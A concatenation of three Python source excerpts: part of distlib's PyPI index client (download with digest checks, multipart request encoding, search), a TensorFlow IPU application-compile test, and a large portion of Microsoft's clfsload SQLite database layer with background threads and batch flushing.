if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
application_compile_and_run_test.py
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import multiprocessing
import os
import tempfile
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.python.client import session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ipu import ipu_infeed_queue
from tensorflow.python.ipu import ipu_outfeed_queue
from tensorflow.python.ipu import loops
from tensorflow.python.ipu import config
from tensorflow.python.ipu.ops import application_compile_op
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.ipu import embedded_runtime
class TestApplicationCompileInProcess(test_util.TensorFlowTestCase):
@tu.test_uses_ipus(num_ipus=2)
@test_util.deprecated_graph_mode_only
def test_from_cache(self):
with tempfile.TemporaryDirectory() as tmp_folder:
def inner_process(pid):
# Set up a cache - executable will be re-used between the processes.
os.environ["TF_POPLAR_FLAGS"] = \
f"--executable_cache_path={tmp_folder} " \
+ os.environ.get("TF_POPLAR_FLAGS", "")
cfg = config.IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
with session.Session() as sess:
dataset = dataset_ops.Dataset.from_tensor_slices(
np.ones(10, dtype=np.float32))
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def body(x):
outfed = outfeed_queue.enqueue(x * x)
return outfed
def my_net():
return loops.repeat(2, body, [], infeed_queue)
result = application_compile_op.experimental_application_compile_op(
my_net, output_path=f"{tmp_folder}/{pid}.poplar_exec)")
compiled_path = sess.run(result)
config.reset_ipu_configuration()
engine_name = f'engine_{self.id()}{pid}'
ctx = embedded_runtime.embedded_runtime_start(compiled_path, [],
engine_name)
input_data = array_ops.placeholder(np.float32, shape=[])
result = embedded_runtime.embedded_runtime_call([input_data], ctx)
with session.Session() as sess:
res = sess.run(result, {input_data: 2.})
self.assertEqual(res, [4.])
processes = []
for i in range(2):
processes.append(
multiprocessing.Process(target=inner_process, args=[i]))
processes[-1].start()
for process in processes:
process.join()
self.assertEqual(process.exitcode, 0)
if __name__ == "__main__":
test.main()
|
db.py
|
#
# clfsload/db.py
#
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
'''
A note about hard links: During the transfer phase, any object
upserted with nlink=1 is not eligible to have backpointers added.
Among other things, the update fastpaths assume this. Any code
is free to assume that any object with nlink=1 during the transfer
phase will never legitimately gain extra links.
'''
import collections
import enum
import json
import logging
import os
import pprint
import sqlite3
import threading
import time
import sqlalchemy
from sqlalchemy import event
from sqlalchemy.engine import Engine
from sqlalchemy.orm.query import Query
from sqlalchemy.orm.session import Session
from clfsload.stypes import AbortException, AdditionalBackpointers, BackpointerLimitReached, \
CLFS_LINK_MAX, CLFSLoadThread, DATA_FTYPES, \
DbEntBase, DbEntAdditionalBackpointerMapEnt, DbEntMeta, DbEntTargetObj, \
DBStats, DbEntMetaKey, DbInconsistencyError, DbTerminalError,\
DryRunResult, ExistingTargetObjKeyBarrier, \
FILEHANDLE_NULL_BYTES, Filehandle, Ftype, Phase, \
SimpleError, TargetObjState, \
TerminalError, TargetObj, TimerStats
from clfsload.util import Monitor, Size, \
current_thread_name, \
elapsed, exc_info_err, exc_log, exc_stack, getframe, notify_all
_CACHE_SIZE = Size.GB
_JOURNAL_MODE = 'WAL'
_MMAP_SIZE = 4 * Size.GB
_PAGE_SIZE = 16 * Size.KB
@event.listens_for(Engine, "connect")
def _connect__set_sqlite_pragma(dbapi_connection, connection_record): # pylint: disable=unused-argument
'''
See:
https://docs.sqlalchemy.org/en/13/dialects/sqlite.html
https://sqlite.org/pragma.html
'''
cursor = None
try:
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA cache_size=%d;" % _CACHE_SIZE)
cursor.execute("PRAGMA journal_mode=%s;" % _JOURNAL_MODE)
cursor.execute("PRAGMA mmap_size=%d;" % _MMAP_SIZE)
# page_size handled in _DBSessionWrapper.__init__
finally:
if cursor:
cursor.close()
class ClfsLoadDB():
'''
This class handles the database-level interactions for CLFSLoad.
This uses SQLAlchemy with SQLite for the backend.
To reduce performance impact, this object maintains a partial
cache of TargetObj rows in various states.
Method naming:
db_*: Direct database access. Time-consuming.
dbc_*: Cached database access. Faster.
While worker phases are executing, only dbc accesses read and modify
DbEntTargetObj. This allows aggressive caching and prefetching/preclaiming.
The metastore and the target object table are not only different
tables, they are stored as entirely separate databases to eliminate
locking conflicts between sessions (transactions). Otherwise,
we get false sharing conflicts between allocating new filehandle
ranges and flushing target object batches.
'''
def __init__(self, thread_shared_state, dirname, logger, file_cleaner, toc_lock=None, db_preclaim_state_class=None):
self._thread_shared_state = thread_shared_state
self._dirname = dirname
self._logger = logger
self.file_cleaner = file_cleaner
db_preclaim_state_class = db_preclaim_state_class if db_preclaim_state_class else PreclaimState
self._phase = None
self.phase_terminal_states = tuple()
self.dbmeta = _DBSessionWrapper(logger, os.path.join(self._dirname, 'meta.db'))
self.dbtobj = _DBSessionWrapper(logger, os.path.join(self._dirname, 'target.db'))
self._dbws = [self.dbmeta, self.dbtobj]
self.dr_init = None # progress at start/resume
self.dr_current = None # current total progress
self.dr_input = None # dry run parameters
self.progress_wrote_last_count = None
self.progress_wrote_last_gb = None
self._bkg_threadstates = list()
self._is_consistent = True
self._terminal_error = ''
self._terminal_error_lock = threading.RLock()
# Public names to simplify sharing with BackgroundThreadStateFhseq
self.fhseq_lock = threading.RLock()
self.fhseq_run_cond = threading.Condition(lock=self.fhseq_lock)
self.fhseq_get_cond = threading.Condition(lock=self.fhseq_lock)
self.fhseq_prev = None # most recent value returned from dbc_fhseq_get()
self.fhseq_dbval = None # last value in the DB
self.fhseq_thread_state = self.BackgroundThreadStateFhseq(self._thread_shared_state, 'fhseq-refresh', self.fhseq_run_cond)
self._bkg_threadstates.append(self.fhseq_thread_state)
# Public names to simplify sharing with BackgroundThreadStateToc
# toc: TargetObj Cache
self.toc_lock = toc_lock if toc_lock else threading.RLock()
self.toc_run_cond = threading.Condition(lock=self.toc_lock)
self.toc_flush_cond = threading.Condition(lock=self.toc_lock)
self.toc_flushing = None # batch that is currently flushing
self.toc_idx_prev = 1 # Always start with a value > 0 to enable logic that waits for flushes
self.toc_idx_flushed_last = 0
self.toc_idx_flushed_and_work_remaining_last = 0
self.toc_flush_list = collections.deque()
self.toc_flush_morenondir_list = collections.deque()
self.toc_flush_moredir_list = collections.deque()
self.toc_buffering = self.TocBatch(self.toc_idx_prev)
self.toc_state_claim_from = None
self.toc_state_claim_to = tuple()
self.toc_thread_state = self.BackgroundThreadStateToc(self._thread_shared_state, 'toc', self.toc_run_cond)
self.toc_preclaim = db_preclaim_state_class(self._logger)
self.toc_flush_next_upsert = False
self.toc_idx_for_preclaim_last = 0
self._bkg_threadstates.append(self.toc_thread_state)
# Set of ExistingTargetObjKey for objects for which dbc_get_existing()
# has been called and dbc_upsert has not been called.
# Does not include non-DIR objects with nlink < 2.
# Note: An alternate implementation sould be to have upsert_existing_pending_dict
# with ExistingTargetObjKey keys and threading.Condition values. Doing
# that replaces false wakeups with the expense of constructing
# and destroying threading.Condition.
self.upsert_existing_pending_set = set()
self.upsert_existing_pending_cond = threading.Condition(lock=self.toc_lock)
# phase_work_poke: invoked as phase_work_poked(num) where num is a number
# of work items now available.
self.phase_work_poke = self._noop
# phase_threads_are_idle: hint from the core that worker threads
# are sitting around doing nothing
self._all_phase_threads_are_idle = False
self._any_phase_threads_are_idle = False
self.timers = None
self.stats = None
self._stats_reset()
self.query_DbEntMeta = Query((DbEntMeta,))
self.query_DbEntTargetObj = Query((DbEntTargetObj,))
self.query_DbEntAdditionalBackpointerMapEnt = Query((DbEntAdditionalBackpointerMapEnt,))
def __str__(self):
return "%s(%s)" % (self.__class__.__name__, self._dirname)
def __repr__(self):
return "<%s,%s,%s>" % (self.__class__.__name__, hex(id(self)), self._dirname)
@staticmethod
def _noop(num):
pass
def check_usable(self):
if not self.should_run:
raise SystemExit(1)
if not self._is_consistent:
raise DbTerminalError("%s is inconsistent" % str(self))
if self._terminal_error:
raise DbTerminalError(self._terminal_error)
def raise_terminal(self, err, fromex=None):
'''
A terminal error is encountered. Raise and remember it.
'''
self.terminal_error = err.rstrip() + ' ' + getframe(1)
raise DbTerminalError(err) from fromex
@property
def logger(self):
return self._logger
@property
def should_run(self):
return self._thread_shared_state.should_run
@should_run.setter
def should_run(self, value):
self._thread_shared_state.should_run = value
@property
def is_consistent(self):
return self._is_consistent
@is_consistent.setter
def is_consistent(self, value):
with self._terminal_error_lock:
if value:
raise SimpleError("%s attempt to set is_consistent to %s %s" % (self, value.__class__.__name__, value))
if self._is_consistent:
self._logger.error("%s marking inconsistent", self)
self._is_consistent = False
if not self._terminal_error:
self._terminal_error = "database is inconsistent"
self._logger.error("%s DB terminal_error is now '%s'" % (self, self._terminal_error))
self._best_effort_wake_all()
@property
def phase(self):
return self._phase
@phase.setter
def phase(self, value):
if self._set_phase(value):
self.db_meta_set([(DbEntMetaKey.PHASE, self._phase)])
def _set_phase(self, value):
'''
Set self._phase = value.
Caller holds toc_lock.
Returns whether or not the phase changed.
'''
ret = False
with self.toc_lock:
prev_phase = self._phase
if prev_phase != value:
self.toc_idx_flushed_and_work_remaining_last = 0
self._stats_reset()
self.stats.stat_set('error_count_entity', self.db_count_in_state(TargetObjState.ERROR))
ret = True
self.check_usable()
if self.toc_flushing is not None:
self.raise_terminal("attempt to update phase while flushing")
if self.toc_buffering:
self.raise_terminal("attempt to update phase with unflushed updates")
self._phase = value
if self._phase == Phase.TRANSFER:
self.toc_state_claim_from = TargetObjState.PENDING
self.toc_state_claim_to = (TargetObjState.GENERATING, TargetObjState.WRITING)
elif self._phase == Phase.RECONCILE:
self.toc_preclaim.accepted_all_offers = False
self.toc_state_claim_from = TargetObjState.INODE_PENDING
self.toc_state_claim_to = (TargetObjState.INODE_WRITING,)
elif self._phase == Phase.CLEANUP:
self.toc_preclaim.accepted_all_offers = False
self.toc_state_claim_from = TargetObjState.INODE_CLEANUP_PENDING
self.toc_state_claim_to = (TargetObjState.INODE_CLEANUP_CLEANING,)
else:
self.toc_state_claim_from = None
self.toc_state_claim_to = tuple()
self.phase_work_poke = self._noop
self._all_phase_threads_are_idle = False
self._any_phase_threads_are_idle = False
self.toc_preclaim.phase = self._phase
self._logger.debug("DB internal phase is now %s", self._phase)
if self._phase == Phase.TRANSFER:
self.phase_terminal_states = (TargetObjState.INODE_PENDING, TargetObjState.DONE, TargetObjState.ERROR)
elif self._phase == Phase.RECONCILE:
self.phase_terminal_states = (TargetObjState.INODE_CLEANUP_PENDING, TargetObjState.ERROR)
elif self._phase == Phase.CLEANUP:
self.phase_terminal_states = (TargetObjState.DONE, TargetObjState.ERROR)
else:
self.phase_terminal_states = tuple()
return ret
@property
def all_phase_threads_are_idle(self):
return self._all_phase_threads_are_idle
@all_phase_threads_are_idle.setter
def all_phase_threads_are_idle(self, value):
with self.toc_lock:
self._all_phase_threads_are_idle = value
self.check_phase_idle_NL()
@property
def any_phase_threads_are_idle(self):
return self._any_phase_threads_are_idle
@any_phase_threads_are_idle.setter
def any_phase_threads_are_idle(self, value):
with self.toc_lock:
self._any_phase_threads_are_idle = value
self.check_phase_idle_NL()
def _best_effort_wake_all(self):
'''
Hacky way to wake up sleeping threads. Used when the DB becomes ill
to let waiters know to bail out. Not guaranteed to issue wakes.
Frustrating that Python Condition variables require locks held.
'''
with Monitor(self.toc_lock, blocking=False) as m:
if m.havelock:
self.toc_run_cond.notify_all()
self.toc_flush_cond.notify_all()
self.upsert_existing_pending_cond.notify_all()
with Monitor(self.fhseq_lock, blocking=False) as m:
if m.havelock:
self.fhseq_run_cond.notify_all()
self.fhseq_get_cond.notify_all()
self.phase_work_poke(0)
@property
def terminal_error(self):
return self._terminal_error
@terminal_error.setter
def terminal_error(self, value):
with self._terminal_error_lock:
if not value:
raise SimpleError("%s attempt to set terminal_error to something falsey (%s %s)" % (self, value.__class__.__name__, value))
# Latch and log the first terminal error
if not self._terminal_error:
self._terminal_error = value
if self._terminal_error != 'SystemExit':
self._logger.error("%s DB terminal_error is now '%s' thread='%s'" % (self, self._terminal_error, current_thread_name()))
self._best_effort_wake_all()
def _stats_reset(self):
'''
Reset stats and timers.
'''
self.timers = TimerStats()
self.timers.start_working()
self.stats = DBStats(lock=self.toc_lock)
def toc_queue_est(self, snap=False):
'''
Return a tuple of:
number of flushes logically pending
estimated time required to perform those flushes.
'''
with self.toc_lock:
qlen = 0
if self.toc_buffering:
qlen += 1
qlen += len(self.toc_flush_list)
if self.toc_flushing is not None:
qlen += 1
stats = self.stats
if snap:
stats.stat_snap_flush_NL()
count1 = stats.get('snap1_flush_count')
seconds1 = stats.get('snap1_flush_seconds')
count2 = stats.get('snap2_flush_count')
seconds2 = stats.get('snap2_flush_seconds')
count = (2 * count1) + count2
seconds = (2 * seconds1) + seconds2
mean = (seconds / count) if count else 0.5
return (qlen, mean*qlen)
def toc_thread_start(self):
'launch toc thread only'
self.toc_thread_state.start(self)
self.toc_thread_state.wait_for_running(self)
def fhseq_thread_start(self):
'start the fhseq thread and wait for it to complete its first fetch'
self.fhseq_thread_state.start(self)
self.fhseq_thread_state.wait_for_running(self)
with self.fhseq_lock:
while self.fhseq_thread_state.any_work_to_do_NL(self):
self.check_usable()
self.fhseq_get_cond.wait(timeout=1.0)
def fhseq_thread_stop(self):
'stop the fhseq thread and wait for it to exit'
self.fhseq_thread_state.stop()
self.fhseq_thread_state.wait_for_stopped(self)
def threads_stop(self, stop_only=False):
'stop background threads'
for threadstate in self._bkg_threadstates:
threadstate.stop()
if stop_only:
return
for threadstate in self._bkg_threadstates:
threadstate.wait_for_stopped(self)
@staticmethod
def version_format_get():
'This is the version number written as VERSION_FORMAT in the metastore'
return 1
def db_tables_create(self):
'''
Create the database tables. This implies that we are starting a new run.
'''
for dbw in self._dbws:
dbw.create_all()
# set VERSION_FORMAT in the metastore
self.db_meta_set([(DbEntMetaKey.VERSION_FORMAT, self.version_format_get())])
# PROGRESS_* are in the tobj DB so they may be updated when TargetObj states change
mdd = [(DbEntMetaKey.PROGRESS_COUNT, int(0)),
(DbEntMetaKey.PROGRESS_GB, float(0.0)),
]
self.db_meta_set(mdd, session_wrapper=self.dbtobj)
def db_dbc_restore_state(self, reset_dirs=True):
'''
We are starting up. Restore state (if any) from previous run.
This performs real, blocking DB accesses to load dbc state.
'''
self.toc_preclaim.load_startup(self, reset_dirs=reset_dirs)
self.db_load_dry_run()
def db_get_progress(self):
'Fetch the current PROGRESS values and return them in DryRunResult form'
# PROGRESS_* are in the tobj DB so they may be updated when TargetObj states change
mdk = [DbEntMetaKey.PROGRESS_COUNT,
DbEntMetaKey.PROGRESS_GB,
]
mdd = self.db_meta_get(mdk, session_wrapper=self.dbtobj)
return DryRunResult(count=mdd[DbEntMetaKey.PROGRESS_COUNT],
gb=mdd[DbEntMetaKey.PROGRESS_GB])
def db_get_reconcile_pending_count(self):
'Return the number of items pending reconcile'
ret = 0
session = self.dbtobj.session_get()
try:
for state in (TargetObjState.INODE_PENDING, TargetObjState.INODE_WRITING):
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
ret += query.count()
return ret
finally:
self.dbtobj.session_release(session)
def db_get_cleanup_pending_count(self):
'Return the number of items pending cleanup'
ret = 0
session = self.dbtobj.session_get()
try:
for state in (TargetObjState.INODE_CLEANUP_PENDING, TargetObjState.INODE_CLEANUP_CLEANING):
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
ret += query.count()
return ret
finally:
self.dbtobj.session_release(session)
def db_any_in_state(self, state):
'Return whether there are any target objects in the given state'
return bool(self.db_count_in_state(state, limit=1))
def db_count_all(self):
'''
Return the total number of rows in the target obj db.
May be done even with the DB in a terminal state.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
return query.count()
finally:
self.dbtobj.session_release(session)
def db_count_in_state(self, state, limit=0):
'Return the number of items in the given state'
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
if limit:
query = query.limit(limit)
return query.count()
finally:
self.dbtobj.session_release(session)
def db_load_dry_run(self):
'Load dry_run results'
self.dr_init = self.db_get_progress()
self.dr_current = DryRunResult(self.dr_init.to_meta())
self.progress_wrote_last_count = self.dr_current.dr_count
self.progress_wrote_last_gb = self.dr_current.dr_gb
# Pull the dry_run results from the normal metastore.
# If they were provided on the command-line, then those
# values are already poked into the DB.
self.dr_input = DryRunResult.get_from_db(self)
def db_has_eta_info(self):
if self.dr_input.dr_gb is not None and self.dr_input.dr_count is not None:
return True
return False
def db_version_format_check(self):
'Compare the VERSION_FORMAT in the metastore with ours'
logger = self._logger
m = self.db_meta_get(DbEntMetaKey.VERSION_FORMAT)
v = self.version_format_get()
if m is None:
raise TerminalError("%s does not appear to contain fully initialized state" % self._dirname)
if m != v:
raise TerminalError("%s has version_format=%s which does not match our version %d" % (self._dirname, m, v))
logger.debug("%s matched version_format=%d", self._dirname, m)
def db_meta_get(self, keys, session_wrapper=None):
'''
Given a single key in keys, return the associated value in the metastore.
Given a list of keys, return a dict of values from the metastore.
None in place of an ent means that the row does not exist.
'''
session_wrapper = session_wrapper if session_wrapper else self.dbmeta
session = session_wrapper.session_get()
try:
query = self.query_DbEntMeta.with_session(session)
if isinstance(keys, (list, tuple, set)):
ret = dict()
for key in keys:
ent = query.get(key)
if ent is not None:
ret[key] = DbEntMetaKey.value_from_dbe(key, ent.m_value)
else:
ret[key] = None
return ret
key = keys
ent = query.get(key)
if ent is None:
return None
return DbEntMetaKey.value_from_dbe(key, ent.m_value)
finally:
session_wrapper.session_release(session)
def db_meta_set(self, kvs, session_wrapper=None):
'Write a list of key, value tuples to the metastore'
session_wrapper = session_wrapper if session_wrapper else self.dbmeta
session = session_wrapper.session_get()
try:
for k, v in kvs:
value = v
if isinstance(value, enum.Enum):
value = value.value
elif isinstance(value, Filehandle):
value = value.hex()
m_value = json.dumps(value)
md = DbEntMeta(m_key=k, m_value=m_value)
session.merge(md)
session.commit()
finally:
session_wrapper.session_release(session)
class _BackgroundThreadState():
'State for one background thread'
def __init__(self, thread_shared_state, thread_name, run_cond):
self._thread_shared_state = thread_shared_state
self._thread_name = thread_name
self._thread = None
self._run_cond = run_cond
self._run_lock = run_cond._lock # pylint: disable=protected-access
self._should_run = True
self._started = False
self._is_done = False
self._slept = False
self._running = False
def __str__(self):
return self._thread_name
def __repr__(self):
return "<%s,%s,%s>" % (self.__class__.__name__, hex(id(self)), self._thread_name)
def __hash__(self):
return hash(self._thread_name)
@property
def should_run(self):
if not self._thread_shared_state.should_run:
return False
return self._should_run
@should_run.setter
def should_run(self, val):
with self._run_cond:
self._should_run = val
self._run_cond.notify_all()
@property
def is_done(self):
return self._is_done
@staticmethod
def time_wait_NL(db): # pylint: disable=unused-argument
'''
Return the maximum number of seconds to spend waiting for work (relative)
'''
return 60.0
def any_work_to_do_NL(self, db, setup_work=False):
'''
Return whether or not there is anything for the thread to do.
Caller holds the Lock associted with run_cond.
'''
raise NotImplementedError("%s(%s) did not implement this method" % (self.__class__.__name__, repr(self)))
def _do_work(self, db):
'''
Perform work designated for this thread.
'''
raise NotImplementedError("%s(%s) did not implement this method" % (self.__class__.__name__, repr(self)))
def _done_work_NL(self, db):
'''
self._do_work() has completed. This is invoked after the
lock associated with _run_cond is re-taken.
'''
# noop here in base class
def start(self, db):
'Launch the thread'
with self._run_cond:
if not self._started:
self._thread = CLFSLoadDBThread(target=self._run, name=self._thread_name, args=(db,))
self._thread.start()
self._started = True
def wait_for_running(self, db):
'wait for the thread to run'
with self._run_cond:
while not self._running:
db.check_usable()
self._run_cond.wait(timeout=30.0)
db.check_usable()
def stop(self):
'tell the thread to stop running'
with self._run_cond:
self._should_run = False
self._run_cond.notify_all()
def wait_for_stopped(self, db):
'wait for it to complete'
with self._run_cond:
self._should_run = False
self._run_cond.notify_all()
while self._started and (not self._is_done):
db.check_usable()
self._run_cond.wait(timeout=30.0)
db.check_usable()
def _run(self, db):
'''
Wrapper around the main loop for one background thread.
Catches exceptions and marks the DB failed so other threads
do not get stuck waiting for this thread. The caller does not
hold the lock.
'''
try:
with self._run_cond:
self._running = True
self._run_cond.notify_all()
self._run__internal(db)
except (AbortException, DbInconsistencyError, DbTerminalError, SystemExit) as e:
db.terminal_error = exc_info_err()
raise SystemExit(1) from e
except:
err = "thread %s failed" % self
db.terminal_error = exc_log(db.logger, logging.ERROR, err)
finally:
with self._run_cond:
self._is_done = True
self._run_cond.notify_all()
def _run__internal(self, db):
'''
Main loop for one background thread
db: backpointer to ClfsLoadDB. Not embedded in self
to avoid managing the circular reference.
'''
with Monitor(self._run_lock) as monitor:
while True:
if not self.should_run:
break
do_work = self.any_work_to_do_NL(db, setup_work=True)
if do_work:
monitor.release()
try:
self._do_work(db)
finally:
monitor.acquire()
self._done_work_NL(db)
self._slept = False
else:
db.check_usable()
self._slept = True
self._run_cond.wait(timeout=self.time_wait_NL(db))
# How much to sdvance FHSEQ each time we fetch it
fhseq_increment = 10000
# Prefetch a new range if we do not have at least this many
# values remaining.
fhseq_low_water = 1000
class BackgroundThreadStateFhseq(_BackgroundThreadState):
'State specific to the fhseq refresh thread'
def any_work_to_do_NL(self, db, setup_work=False):
'See base class'
if not (db.fhseq_prev and db.fhseq_dbval):
return True
if (db.fhseq_dbval - db.fhseq_prev) < db.fhseq_low_water:
return True
return False
def _do_work(self, db):
'See base class'
key = DbEntMetaKey.FHSEQ
key_name = str(key)
session = db.dbmeta.session_get()
try:
query = db.query_DbEntMeta.with_session(session)
ent = query.get(key_name)
if ent is None:
cur = Filehandle.fhseq_first_get()
ent = DbEntMeta(m_key=key_name, m_value=cur)
session.add(ent)
else:
try:
cur = int(ent.m_value)
except ValueError as e:
db.is_consistent = False
raise DbInconsistencyError("cannot interpret %s='%s' as integer" % (key_name, ent.m_value)) from e
new = cur + db.fhseq_increment
if new <= cur:
db.raise_terminal("db_fhseq_get cur=%s fhseq_increment=%s ent=%s value did not advance" % (cur, db.fhseq_increment, ent))
ent.m_value = new
session.commit()
with db.fhseq_get_cond:
db.fhseq_prev = cur
db.fhseq_dbval = new
finally:
db.dbmeta.session_release(session)
def _done_work_NL(self, db):
'See base class'
db.fhseq_get_cond.notify_all()
def db_claimable_get(self):
'Return one claimable entry'
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
states = (self.toc_state_claim_from,) + self.toc_state_claim_to
for state in states:
query2 = query.filter(DbEntTargetObj.state == state).limit(1)
for dbe in query2:
return TargetObj.from_dbe(dbe)
return None
finally:
self.dbtobj.session_release(session)
@staticmethod
def db_load_additional_backpointers_for_tobj(bpquery, tobj):
'Load the additional_backpointers for tobj'
query_result = bpquery.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == tobj.filehandle.bytes)
# Even if the query returns no results, we populate an empty AdditionalBackpointers here.
# Doing so allows us to differentiate between "nothing found" and "not loaded"
# when looking at tobj.ic_backpointer_map.
tobj.ic_backpointer_map = AdditionalBackpointers(tobj.filehandle, query_result)
@staticmethod
def db_additional_backpointers_ent_get(bpquery, filehandle_from, filehandle_to):
'Load the ent corresponding to the given filehandle_from, filehandle_to tuple'
query = bpquery.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == filehandle_from.bytes)
query = query.filter(DbEntAdditionalBackpointerMapEnt.filehandle_to == filehandle_to.bytes)
query_result = list(query)
if not query_result:
return None
if len(query_result) != 1:
raise DbInconsistencyError("db_additional_backpointers_ent_get matched %d entries for %s %s"
% (len(query_result), filehandle_from, filehandle_to))
return query_result[0]
def dbc_fhseq_get(self):
'Get a unique fhseq value.'
with self.fhseq_get_cond:
self.check_usable()
while (not self.fhseq_prev) or (not self.fhseq_dbval) or (self.fhseq_prev >= self.fhseq_dbval):
self.fhseq_run_cond.notify()
self.check_usable()
self.fhseq_get_cond.wait(timeout=30.0)
self.check_usable()
self.fhseq_prev += 1
# Trigger prefetch if we hit low-water
if self.fhseq_thread_state.any_work_to_do_NL(self):
self.fhseq_run_cond.notify()
return self.fhseq_prev
class TocBatch():
'Describes a logical chunk of changes to the database'
# Push into the flush queue if flush_dirty_count_min objects are awaiting update
# If this is too small, flushes are inefficient.
# If this is too large, then we can suddenly run out of preclaimed
# work items and need a long time to flush.
# When in the flush queue, we can allow more upserts, up to
# flush_dirty_count_nondir_max/flush_dirty_count_max objects in the batch.
flush_dirty_count_min = 900
flush_dirty_count_nondir_max = 1400
flush_dirty_count_max = 1500
# If the batch has been dirty for at least this many seconds,
# it wants to flush even if there is no other reason to do so.
# This is used to ensure that if the worker threads get busy
# for a long time handling large objects, we do not sit around
# without processing transitions to DONE. In the presence of
# objects that take a long time, we could end up repeating a
# lot of work unnecessarily in the event of a crash if we do
# not do this.
flush_dirty_seconds = 60.0
def __init__(self, idx):
self.toc_idx = idx
self._upsert_tobj = dict() # key=Filehandle value=TargetObj
self._upsert_existing_dict = dict() # key=ExistingTargetObjKey value=list(TargetObj)
self._upsert_existing_valid = True # whether or not self._upsert_existing_dict is accurate
self._update_tobj = dict() # key=Filehandle value=_UpdateStateDesc
self._update_state = dict() # key=Filehandle value=_UpdateStateDesc
self._add_backpointer = dict() # key=Filehandle(from), value=dict(key=Filehandle(to), value=count)
self.getexistingkeys = set() # ExistingTargetObjKey
self.getexistingresults = dict() # key=ExistingTargetObjKey value=[TargetObj,...]
self.must_flush = False
# More ideally, we'd set self._dirty_time = None here,
# and update it to time.time() on the first operation
# that adds an update. That means checking dirty vs non-dirty
# during each update operation while holding a very hot
# lock. The effect is a noticible performance lag. Instead,
# we use an imperfect time here. The cost of the imperfection
# is a lesser performance hit than that of being more exact.
self._dirty_time = time.time()
self.flush_time = self._dirty_time + self.flush_dirty_seconds
# flush state
self._flush_dbobjs = dict() # key=filehandle_bytes val=DbEntTargetObj
self._flush_reap_dirs = dict() # key=filehandle_bytes, value=DbEntTargetObj
self._flush_reap_check = dict() # key=filehandle_bytes, value=DbEntTargetObj
self._flush_dir_writing = list() # Ftype.DIR that changed state to WRITING
self._dir_fh_done = list() # List of Filehandle for Ftype.DIR that became TargetObjState.DONE
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.toc_idx)
def __len__(self):
return len(self._upsert_tobj) + len(self._update_tobj) + len(self._update_state) + len(self._add_backpointer)
def __bool__(self):
return self.must_flush \
or bool(self._upsert_tobj) \
or bool(self._update_tobj) \
or bool(self._update_state) \
or bool(self._add_backpointer) \
or bool(self.getexistingkeys)
def upsert_count_NL(self):
'Return the number of pending upserts'
return len(self._upsert_tobj)
def flush_for_time(self):
'''
Return whether this batch should flush based on
how long it has been dirty. See flush_dirty_seconds above.
'''
return bool(self) and (time.time() >= self.flush_time)
